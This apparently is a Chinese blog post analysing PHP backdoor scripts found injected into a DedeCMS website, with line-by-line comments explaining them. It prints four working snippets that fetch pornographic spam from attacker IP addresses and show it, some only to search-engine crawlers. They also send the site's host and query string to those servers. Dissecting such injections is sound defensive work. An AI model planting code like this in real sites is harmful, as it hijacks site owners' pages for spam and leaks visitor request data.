织梦被挂黑链及file_get_contents函数

最近公司的一台服务器上的网站,页面被挂黑链,程序是织梦的,下面我们研究一下挂马的代码。

织梦被挂黑链及file_get_contents函数-完美源码

<?php
set_time_limit(0); //设置程序永久执行
header("Content-Type: text/html;charset=utf-8"); //设置utf-8
date_default_timezone_set('PRC'); //设定用于所有日期时间函数的默认时区
$Percent = rand(0,100);  //生成随便整数
if($Percent<60)
$asdasp4 = "http://45.207.33.91/"; 
else
$asdasp4 = "http://45.207.33.91/";  //这两个IP一致,不管是小于60,还是大于60都是一个IP
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; //获取URL地址和文件名
$Cf=file_get_contents($asdasp4."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
//获取45.207.33.91上的内容,是一个色情广告。
echo $Cf;
die; //中止脚本执行,下面不在执行。
?>

<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"]; //用来检查浏览页面的访问者在用什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好的代码
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false) //查找浏览器oogle非恒等于假,或者查找浏览器aidu非恒等于假
{
   $file = file_get_contents('http://45.207.33.91/');  //满足if条件则获取该地址内容
   echo $file;
   exit ; //结束
}
?>

第三个脚本是把第一和二做了整合,不做注释了
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"]; 
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://103.214.143.26/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}
?>
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=utf-8");
$cawer1qw351gasdqa5rhgq = "http://45.207.33.91/"; 
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构成URL当前页
$Content_mb=getHTTPPage($cawer1qw351gasdqa5rhgq."/index.php?host=".$host_name); //调用远程网站

function getHTTPPage($url) { //调用远程网站函数
	$opts = array(
	  'http'=>array(
		'method'=>"GET",
		'header'=>"User-Agent: aQ0O010O"
	  )
	);
	$context = stream_context_create($opts);
	$html = @file_get_contents($url, false, $context); //访问远程网站,你的URL也上传过去了
	if (empty($html)) {
		exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
	}	
	return $html;
} 

echo $Content_mb;
?>
END
如本资源侵犯了您的权益,请联系投诉邮箱admin@wmphp.com进行举报!我们将在收到邮件的1个小时内处理完毕。 本站仅为平台,发布的资源均为用户投稿或转载!所有资源仅供参考学习使用,请在下载后的24小时内删除,禁止商用! Wmphp.com(完美源码)助力正版,如您有自己的原创产品,可以联系客服投稿,代理出售! Wmphp.com(完美源码)客服QQ:136882447 Wmphp.com(完美源码)商务电话(仅对企业客户/个人用户):15120086569 (微信同步) 请注意:本站不提供任何免费的技术咨询服务,为了节约时间,下载前 请确认自己会技术
完美源码 » 织梦被挂黑链及file_get_contents函数
2490+

本站勉强运行

293+

用户总数

518+

资源总数

0+

今日更新

2021-6-29

最后更新时间